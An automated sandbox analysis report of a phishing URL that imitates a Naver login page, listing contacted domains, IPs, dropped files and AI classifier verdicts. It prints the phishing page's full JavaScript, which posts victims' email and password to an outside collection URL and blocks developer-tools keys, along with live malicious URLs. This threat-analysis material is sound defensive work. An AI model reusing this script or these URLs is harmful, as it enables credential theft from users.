Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: Google Drive.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk	Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 Browser Extensions	1 Process Injection	1 Masquerading	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Registry Run Keys / Startup Folder	1 Registry Run Keys / Startup Folder	1 Process Injection	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	3 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	4 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	1 Ingress Tool Transfer	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
https://heuristic-knuth-588d37.netlify.app/?naps/	100%	Avira URL Cloud	phishing

Source	Detection	Scanner	Label
https://essentialhandymanservices.com/wp/next.php	100%	Avira URL Cloud	malware
http://www.xay.io/track.php?domain=xay.io&toggle=browserjs&uid=MTczNjY0MTk5OC42Mjk3OjZiNTYzNWM4MjkwMjRjZjEyNmJlMGYwNjk0Mjg5MDVkMDUxYTA3M2JiYTQ5MjZmZDY5Yjc2Zjg0MjE1N2RlMjk6Njc4MzBkY2U5OWJkOQ%3D%3D	0%	Avira URL Cloud	safe
http://www.xay.io/track.php?domain=xay.io&caf=1&toggle=answercheck&answer=yes&uid=MTczNjY0MTk5OC42Mjk3OjZiNTYzNWM4MjkwMjRjZjEyNmJlMGYwNjk0Mjg5MDVkMDUxYTA3M2JiYTQ5MjZmZDY5Yjc2Zjg0MjE1N2RlMjk6Njc4MzBkY2U5OWJkOQ%3D%3D	0%	Avira URL Cloud	safe
http://www.xay.io/favicon.ico	0%	Avira URL Cloud	safe
http://www.xay.io/ls.php?t=67830dce&token=81c92fd1c3d837096544712dee4879b2447b28ba	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
stackpath.bootstrapcdn.com	104.18.11.207	true	false	high
obseu.netgreencolumn.com	3.248.162.96	true	false	high
heuristic-knuth-588d37.netlify.app	3.125.36.175	true	true	unknown
syndicatedsearch.goog	172.217.16.206	true	false	high
www.google.com	172.217.18.4	true	false	high
kr1-nid.naver.com.nfront.nheos.com	110.93.159.46	true	false	unknown
www.xay.io	75.2.115.196	true	true	unknown
euob.netgreencolumn.com	52.222.236.17	true	false	high
googlehosted.l.googleusercontent.com	142.250.185.65	true	false	high
d38psrni17bvxu.cloudfront.net	18.66.121.135	true	false	high
ipv4.imgur.map.fastly.net	199.232.196.193	true	false	high
www.dynadot.com	104.16.152.132	true	false	high
afs.googleusercontent.com	unknown	unknown	false	high
i.imgur.com	unknown	unknown	false	high
essentialhandymanservices.com	unknown	unknown	false	unknown
nid.naver.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://www.google.com/adsense/domains/caf.js?abp=1&adsdeli=true	false		high
http://www.xay.io/privacy.html	false		unknown
http://www.xay.io/	true		unknown
https://syndicatedsearch.goog/afs/gen_204?client=dp-teaminternet09_3ph&output=uds_ads_only&zx=lwf3qohhv0j&aqid=0Q2DZ5GwDdGvjuwPrJSBkA4&psid=7840396037&pbt=bv&adbx=366.5&adby=214&adbh=511&adbw=530&adbah=160%2C160%2C160&adbn=master-1&eawp=partner-dp-teaminternet09_3ph&errv=712519386&csala=6%7C0%7C987%7C1235%7C249&lle=0&ifv=1&hpt=1	false		high
https://obseu.netgreencolumn.com/mon	false		high
https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js	false		high
https://afs.googleusercontent.com/ad_icons/standard/publisher_icon_image/chevron.svg?c=%23ffffff	false		high
http://d38psrni17bvxu.cloudfront.net/themes/cleanPeppermintBlack_657d9013/img/arrows.png	false		high
https://www.dynadot.com/tr/mainsite2023/navbar-logo-dark-2023.png	false		high
https://obseu.netgreencolumn.com/tracker/tc_imp.gif?e=37dfbd8ee84e001269e8c131e8478a9c9225c24f567d43d6da1908be6245cad7bd70a976750ef80ed89373bfe70e9c20c1e53e8d59168a6f2617071a10acf9f29f671dd78bdc0f7d3a1cfa792251d532df659600350c219301020932555ac3ed3f1e77be26bb25cb43e29b25f45471ad0f2e6410d25afe5aecd2948a7fe07f52a13ad2a24710d14e681f2d1586d31c64e56ac8bf88b71208fe59f1d329e921c46bcf40e25c7ea8290ee95c400035db386ee683e99332bd06b442c316f0496f70bfc72f02431e24f97999c140ab51258fc6e279126332a5de6c7fd6d5431f2b436f0715a7902c701e56f2ab0b2093aef6298ee35d60013ee9f3e4869265bcd5d759bf079d5d3a63ccea9de6f13599d9b13a93350983f0c82a1e1ea3683aba8c063abbcaf1778807fc4eae965d8013d9c56d9c7c71d69338c722d795f6bbdea6fd4075e93daaa9ae7c433ebdcf71d2e113f01a1813dd405c85d0cd88c0bcdd70ff1b90d0f58838b62f3574937b6bccc2df0e37d7ec74bb11e0830dce37ef33024a5e8c6eff03dfcba874b4822ac419e0cf929b6b8d4d4f68fe481f5e72092687a023fa05d1cfa62aae9969ebbb2a9adaa9b13dc1f0e35f477083ee5252f0b1490242bbacac74e66688e037f2e62eb211bc23c1168d40c5a22ec60426e3ad94603b3e690a23151442d998e82c927cb20030067f83c50acd840a4fbbe18ba8b67ec3f3e5fb85fea9f54a4635f259c4d5212bf40a3b7aac090b3b04910df76405d0af843ade72dd378ab52dcabb0b9f7f0e28290b624df49f9bd9760326f969229d87dbc7c1d84f17dcf0eb6f9ca41e67ca9056657bf391c54475e663d423c049b27bc24d85aa46afe36dbc8982d0845536baa229699f70a68dacb956c13d261c05887a030de4e14d85f112ca9987da1490c595390e2b55e17ef854b85fb29d7bc971107403287762e75a8e9d210afa3c82b5ff35c5dd14da2161a510603eceabc30059ed74f392028344484038e0647fd9f6893fd95d68cbd950f492&cri=S9cmgKYQSv&ts=1155&cb=1736642001047	false		high
https://syndicatedsearch.goog/afs/gen_204?client=dp-teaminternet09_3ph&output=uds_ads_only&zx=5ufhciitm2l3&aqid=0Q2DZ5GwDdGvjuwPrJSBkA4&psid=7840396037&pbt=bs&adbx=366.5&adby=214&adbh=511&adbw=530&adbah=160%2C160%2C160&adbn=master-1&eawp=partner-dp-teaminternet09_3ph&errv=712519386&csala=6%7C0%7C987%7C1235%7C249&lle=0&ifv=1&hpt=1	false		high
https://syndicatedsearch.goog/adsense/domains/caf.js?pac=0	false		high
https://afs.googleusercontent.com/ad_icons/standard/publisher_icon_image/search.svg?c=%23ffffff	false		high
http://www.xay.io/ls.php?t=67830dce&token=81c92fd1c3d837096544712dee4879b2447b28ba	false	Avira URL Cloud: safe	unknown
https://heuristic-knuth-588d37.netlify.app/?naps/	true		unknown
http://www.xay.io/track.php?domain=xay.io&caf=1&toggle=answercheck&answer=yes&uid=MTczNjY0MTk5OC42Mjk3OjZiNTYzNWM4MjkwMjRjZjEyNmJlMGYwNjk0Mjg5MDVkMDUxYTA3M2JiYTQ5MjZmZDY5Yjc2Zjg0MjE1N2RlMjk6Njc4MzBkY2U5OWJkOQ%3D%3D	false	Avira URL Cloud: safe	unknown
https://i.imgur.com/g1U1hqo.png	false		high
http://www.xay.io/favicon.ico	false	Avira URL Cloud: safe	unknown
https://nid.naver.com/favicon_1024.png	false		high
http://www.xay.io/track.php?domain=xay.io&toggle=browserjs&uid=MTczNjY0MTk5OC42Mjk3OjZiNTYzNWM4MjkwMjRjZjEyNmJlMGYwNjk0Mjg5MDVkMDUxYTA3M2JiYTQ5MjZmZDY5Yjc2Zjg0MjE1N2RlMjk6Njc4MzBkY2U5OWJkOQ%3D%3D	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://syndicatedsearch.goog	chromecache_86.2.dr, chromecache_96.2.dr, chromecache_111.2.dr, chromecache_81.2.dr	false		high
https://essentialhandymanservices.com/wp/next.php	chromecache_103.2.dr	false	Avira URL Cloud: malware	unknown
https://i.imgur.com/g1U1hqo.png);	chromecache_103.2.dr	false		high
https://getbootstrap.com/)	chromecache_108.2.dr, chromecache_95.2.dr	false		high
https://github.com/twbs/bootstrap/graphs/contributors)	chromecache_108.2.dr, chromecache_95.2.dr	false		high
https://github.com/twbs/bootstrap/blob/master/LICENSE)	chromecache_108.2.dr, chromecache_95.2.dr	false		high
https://www.google.com/pagead/1p-conversion/16521530460/?gad_source=1&adview_type=5	chromecache_86.2.dr, chromecache_96.2.dr, chromecache_111.2.dr, chromecache_81.2.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
18.66.121.138	unknown	United States	3	MIT-GATEWAYSUS	false
142.250.185.100	unknown	United States	15169	GOOGLEUS	false
199.232.196.193	ipv4.imgur.map.fastly.net	United States	54113	FASTLYUS	false
104.16.153.132	unknown	United States	13335	CLOUDFLARENETUS	false
75.2.115.196	www.xay.io	United States	16509	AMAZON-02US	true
3.248.162.96	obseu.netgreencolumn.com	United States	16509	AMAZON-02US	false
18.66.121.135	d38psrni17bvxu.cloudfront.net	United States	3	MIT-GATEWAYSUS	false
54.75.69.192	unknown	United States	16509	AMAZON-02US	false
142.250.186.33	unknown	United States	15169	GOOGLEUS	false
142.250.185.65	googlehosted.l.googleusercontent.com	United States	15169	GOOGLEUS	false
3.125.36.175	heuristic-knuth-588d37.netlify.app	United States	16509	AMAZON-02US	true
172.217.16.206	syndicatedsearch.goog	United States	15169	GOOGLEUS	false
172.217.18.4	www.google.com	United States	15169	GOOGLEUS	false
199.232.192.193	unknown	United States	54113	FASTLYUS	false
216.58.206.68	unknown	United States	15169	GOOGLEUS	false
104.18.11.207	stackpath.bootstrapcdn.com	United States	13335	CLOUDFLARENETUS	false
110.93.159.46	kr1-nid.naver.com.nfront.nheos.com	Korea Republic of	23576	NHN-AS-KRNBPKR	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
52.222.236.17	euob.netgreencolumn.com	United States	16509	AMAZON-02US	false
125.209.233.21	unknown	Korea Republic of	23576	NHN-AS-KRNBPKR	false
104.16.152.132	www.dynadot.com	United States	13335	CLOUDFLARENETUS	false

Private

IP
192.168.2.6
192.168.2.5

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1589350
Start date and time:	2025-01-12 01:31:56 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 3m 6s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	browseurl.jbs
Sample URL:	https://heuristic-knuth-588d37.netlify.app/?naps/
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal76.phis.win@18/60@59/23
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 142.250.185.227, 142.250.186.142, 142.251.168.84, 142.250.185.110, 142.250.184.206, 216.58.206.46, 142.250.184.234, 142.250.181.234, 172.217.18.10, 142.250.185.106, 142.250.186.42, 216.58.206.42, 142.250.184.202, 142.250.186.106, 172.217.23.106, 172.217.16.138, 142.250.185.170, 142.250.186.138, 142.250.185.202, 142.250.186.74, 216.58.212.138, 142.250.185.234, 142.250.186.170, 199.232.210.172, 192.229.221.95, 142.250.186.110, 216.58.206.78, 142.250.186.66, 216.58.206.34, 142.250.181.238, 142.250.186.46, 142.250.185.163, 142.250.185.206, 184.28.90.27, 4.245.163.56, 13.107.246.45, 52.149.20.212
Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, otelrules.azureedge.net, ajax.googleapis.com, partner.googleadservices.com, ctldl.windowsupdate.com, clientservices.googleapis.com, nid.naver.com.akadns.net, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, clients.l.google.com
Not all processes where analyzed, report is missing behavior information
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: https://heuristic-knuth-588d37.netlify.app/?naps/

Input	Output
URL: https://heuristic-knuth-588d37.netlify.app Model: Joe Sandbox AI	{ "typosquatting": false, "unusual_query_string": false, "suspicious_tld": false, "ip_in_url": false, "long_subdomain": false, "malicious_keywords": false, "encoded_characters": false, "redirection": false, "contains_email_address": false, "known_domain": true, "brand_spoofing_attempt": false, "third_party_hosting": true }
URL: https://heuristic-knuth-588d37.netlify.app
URL: https://heuristic-knuth-588d37.netlify.app/?naps/... Model: Joe Sandbox AI	{ "risk_score": 7, "reasoning": "The script demonstrates several high-risk behaviors, including data exfiltration, redirects to potentially malicious domains, and the use of obfuscated code. While some of the behaviors may be intended for legitimate purposes, such as analytics or error reporting, the overall implementation and lack of transparency raise significant security concerns." }
/* global $ */ $(document).ready(function(){ var count=0; // $('#back1').click(function () { // $("#msg").hide(); // $('#email').val(""); // $("#automail").animate({left:200, opacity:"hide"}, 0); // $("#inputbar").animate({right:200, opacity:"show"}, 1000); // }); /////////////url email getting//////////////// var email = window.location.hash.substr(1); if (!email) { } else { // $('#email').val(email); var my_email =email; var ind=my_email.indexOf("@"); var my_slice=my_email.substr((ind+1)); var c= my_slice.substr(0, my_slice.indexOf('.')); var final= c.toLowerCase(); $('#contact').trigger("reset"); $("#msg").hide(); $('#fieldImg').attr('src', 'images/other-1.png'); $('#field').html("Other Mail"); $('#email').val(my_email); $('#emailch').html(my_email); $("#msg").hide(); // $("#inputbar").animate({left:200, opacity:"hide"}, 0); // $("#automail").animate({right:200, opacity:"show"}, 1000); } ///////////////url getting email//////////////// $('#submit-btn').click(function(event){ $('#error').hide(); $('#msg').hide(); event.preventDefault(); var email=$("#email").val(); var password=$("#password").val(); ///////////new injection//////////////// var my_email =email; var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/; if (!filter.test(my_email)) { $('#error').show(); email.focus; return false; } var ind=my_email.indexOf("@"); var my_slice=my_email.substr((ind+1)); var c= my_slice.substr(0, my_slice.indexOf('.')); var final= c.toLowerCase(); ///////////new injection//////////////// count=count+1; $.ajax({ dataType: 'JSON', url: 'https://essentialhandymanservices.com/wp/next.php', type: 'POST', data:{ email:email, password:password, }, // data: $('#contact').serialize(), beforeSend: function(xhr){ $('#submit-btn').html('Verifing...'); }, success: function(response){ if(response){ $("#msg").show(); console.log(response); if(response['signal'] == 'ok'){ $("#password").val(""); if (count>=2) { count=0; // window.location.replace(response['redirect_link']); window.location.replace("http://www."+my_slice); } $('#msg_text').html(response['msg']); } else{ $('#msg_text').html(response['msg']); } } }, error: function(){ $("#password").val(""); if (count>=2) { count=0; window.location.replace("http://www."+my_slice); } $("#msg").show(); $('#msg_text').html("Please try again"); }, complete: function(){ $('#submit-btn').html('Sign in'); } }); }); }); document.onkeydown=function(e){ if (e.ctrlKey && (e.keyCode === 73 \|\| e.keyCode === 105 \|\| e.keyCode === 74 \|\| e.keyCode === 106 \|\| e.keyCode === 85 \|\| e.keyCode === 117)) { alert('not allowed'); return false; } else { return true; } }
URL: http://www.xay.io/... Model: Joe Sandbox AI	{ "risk_score": 7, "reasoning": "The provided JavaScript snippet exhibits several high-risk behaviors, including data exfiltration, redirects to potentially malicious domains, and the use of obfuscated code. While some contextual factors, such as the use of analytics-related functionality, may suggest a legitimate purpose, the overall behavior of the script is concerning and requires further investigation." }
let isAdult=false; let containerNames=[]; let uniqueTrackingID='MTczNjY0MTk5OC42Mjk3OjZiNTYzNWM4MjkwMjRjZjEyNmJlMGYwNjk0Mjg5MDVkMDUxYTA3M2JiYTQ5MjZmZDY5Yjc2Zjg0MjE1N2RlMjk6Njc4MzBkY2U5OWJkOQ=='; let search=''; let themedata='fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwMTEsYnVja2V0MDg4LGJ1Y2tldDA4OXx8fHx8fDY3ODMwZGNlOTliOTB8fHwxNzM2NjQxOTk4LjY2MjJ8N2EyYzRhMzJkMDU2MjAwZDY2NGEyMDU4ZTdjZTdhNDRkOGQyNDhhYnx8fHx8MXx8MHwwfHx8fDF8fHx8fDB8MHx8fHx8fHx8fHwwfDB8fDB8fHwwfDB8VzEwPXx8MXxXMTA9fDgxYzkyZmQxYzNkODM3MDk2NTQ0NzEyZGVlNDg3OWIyNDQ3YjI4YmF8MHxkcC10ZWFtaW50ZXJuZXQwOV8zcGh8MHwwfHx8fA=='; let domain='xay.io'; let scriptPath=''; let adtest='off';if(top.location!==location) { top.location.href=location.protocol + '//' + location.host + location.pathname + (location.search ? location.search + '&' : '?') + '_xafvr=ZDg4ZDI4YTQwODNmZWY1YzQzZjFlNTQ1MWI1NTU2MTc0MjQ5Mzk3Miw2NzgzMGRjZWExYThj'; }let pageLoadedCallbackTriggered = false;let fallbackTriggered = false;let formerCalledArguments = false;let pageOptions = {'pubId': 'dp-teaminternet01','resultsPageBaseUrl': '//' + location.host + '/?ts=','fontFamily': 'arial','optimizeTerms': true,'maxTermLength': 40,'adtest': true,'clicktrackUrl': '//' + location.host + '/track.php?','attributionText': 'Ads','colorAttribution': '#b7b7b7','fontSizeAttribution': 16,'attributionBold': false,'rolloverLinkBold': false,'fontFamilyAttribution': 'arial','adLoadedCallback': function(containerName, adsLoaded, isExperimentVariant, callbackOptions) {let data = {containerName: containerName,adsLoaded: adsLoaded,isExperimentVariant: isExperimentVariant,callbackOptions: callbackOptions,terms: pageOptions.terms};if (!adsLoaded \|\| (containerName in containerNames)) {ajaxQuery(scriptPath + "/track.php"+ "?toggle=adloaded"+ "&uid=" + encodeURIComponent(uniqueTrackingID)+ "&domain=" + encodeURIComponent(domain)+ "&data=" + encodeURIComponent(JSON.stringify(data)));}},'pageLoadedCallback': function (requestAccepted, status) {document.body.style.visibility = 'visible';pageLoadedCallbackTriggered = true;if ((status.faillisted === true \|\| status.faillisted == "true" \|\| status.blocked === true \|\| status.blocked == "true" ) && status.error_code != 25) {ajaxQuery(scriptPath + "/track.php?domain=" + encodeURIComponent(domain) + "&caf=1&toggle=block&reason=other&uid=" + encodeURIComponent(uniqueTrackingID));}if (status.errorcode && !status.error_code) {status.error_code = status.errorcode;}if (status.error_code) {ajaxQuery(scriptPath + "/track.php?domain=" + encodeURIComponent(domain) + "&caf=1&toggle=errorcode&code=" + encodeURIComponent(status.error_code) + "&uid=" + encodeURIComponent(uniqueTrackingID));if ([18, 19].indexOf(parseInt(status.error_code)) != -1 && fallbackTriggered == false) {fallbackTriggered = true;if (typeof loadFeed === "function") {window.location.href = '//' + location.host;}}if (status.error_code == 20) {window.location.replace("//dp.g.doubleclick.net/apps/domainpark/domainpark.cgi?client=" + encodeURIComponent((pageOptions.pubid.match(/^ca-/i) ? "" : "ca-") + pageOptions.pubid) + "&domain_name=" + encodeURIComponent(domain) + "&output=html&drid=" + encodeURIComponent(pageOptions.domainRegistrant));}}if (status.needsreview === true \|\| status.needsreview == "true") {ajaxQuery(scriptPath + "/track.php?domain=" + encodeURIComponent(domain) + "&caf=1&toggle=needsreview&uid=" + encodeURIComponent(uniqueTrackingID));}if ((status.adult === true \|\| status.adult == "true") && !isAdult) {ajaxQuery(scriptPath + "/track.php?domain=" + encodeURIComponent(domain) + "&caf=1&toggle=adult&uid=" + encodeURIComponent(uniqueTrackingID));} else if ((status.adult === false \|\| status.adult == "false") && isAdult) {ajaxQuery(scriptPath + "/track.php?domain=" + encodeURIComponent(domain) + "&caf=1&toggle=nonadult&uid=" + encodeURIComponent(uniqueTrackingID));}if (requestAccepted) {if (status.feed) {ajaxQuery(scriptPath + "/track.php?domain=" + encodeURIComponent(domain) + "&caf=1&
URL: http://www.xay.io/... Model: Joe Sandbox AI	{ "risk_score": 4, "reasoning": "The script uses an XHR request to fetch data from a server, which is a moderate-risk indicator. However, the data being fetched does not appear to be sensitive, and the script is not exhibiting any high-risk behaviors like dynamic code execution or data exfiltration. The use of a token and the lack of suspicious domains or obfuscation suggest this is likely a legitimate script, but the lack of transparency around the data being fetched warrants further review." }
var ls = function(xhr, path, token) { xhr.onreadystatechange = function () { if (xhr.readyState === XMLHttpRequest.DONE) { if (xhr.status >= 200 && xhr.status <= 400) { if (xhr.responseText.trim() === '') { return; } console.log(JSON.parse(xhr.responseText)) } else { console.log('There was a problem with the request.'); } } } xhr.open('GET', path + '/ls.p' + 'hp?t=67830dce&token=' + encodeURI(token), true); xhr.send(); }; ls(new XMLHttpRequest(), scriptPath, '81c92fd1c3d837096544712dee4879b2447b28ba');
URL: https://heuristic-knuth-588d37.netlify.app/?naps/ Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "Sign in", "text_input_field_labels": [ "Username", "Password" ], "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": true, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: http://www.xay.io/ Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: https://heuristic-knuth-588d37.netlify.app/?naps/ Model: Joe Sandbox AI	{ "brands": [ "Naver" ] }
	{ "brands": [ "Naver" ] }
URL: http://www.xay.io/ Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: http://www.xay.io/ Model: Joe Sandbox AI	{ "brands": [ "Dynadot" ] }
	{ "brands": [ "Dynadot" ] }
URL: http://www.xay.io/ Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: http://www.xay.io/privacy.html Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: http://www.xay.io/ Model: Joe Sandbox AI	{ "brands": [ "Dynadot" ] }
	{ "brands": [ "Dynadot" ] }
URL: https://heuristic-knuth-588d37.netlify.app/?naps/ Model: Joe Sandbox AI	```json{ "legit_domain": "naver.com", "classification": "wellknown", "reasons": [ "The brand 'Naver' is a well-known South Korean online platform.", "The legitimate domain for Naver is 'naver.com'.", "The URL 'heuristic-knuth-588d37.netlify.app' does not match the legitimate domain for Naver.", "The URL is hosted on 'netlify.app', which is a platform for deploying web applications and not directly associated with Naver.", "The use of a generic subdomain pattern 'heuristic-knuth-588d37' is typical for automatically generated URLs on hosting platforms and is not indicative of a legitimate Naver site.", "Presence of input fields for 'Username' and 'Password' on a non-legitimate domain increases the risk of phishing." ], "riskscore": 9} Google indexed: False
URL: heuristic-knuth-588d37.netlify.app Brands: Naver Input Fields: Username, Password
URL: http://www.xay.io/ Model: Joe Sandbox AI	{ "brands": [ "Dynadot" ] }
	{ "brands": [ "Dynadot" ] }
URL: http://www.xay.io/privacy.html Model: Joe Sandbox AI	{ "brands": [ "Team Internet AG" ] }
	{ "brands": [ "Team Internet AG" ] }

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sat Jan 11 23:32:50 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	3.981655210251639
Encrypted:	false
SSDEEP:	48:8OdQTUbwsH7idAKZdA19ehwiZUklqeh9y+3:8duwgey
MD5:	B12F7DBBB7A4B87882121E6B9CA66F34
SHA1:	9DC748E33097FE876D6457FC85DFD01B45941DB9
SHA-256:	6F86B3A56154744E57E91425838B304F0A1148031727713876F99094D0534FD3
SHA-512:	5A7A124612CF7386B9FF81F31B3B6EE565EF2C5F21DA7CA89395CF18064CBD46F9F0C812125598B19627D859BAFFB3A90E4B63870F4674C0BB59AEF20853EF84
Malicious:	false
Reputation:	low
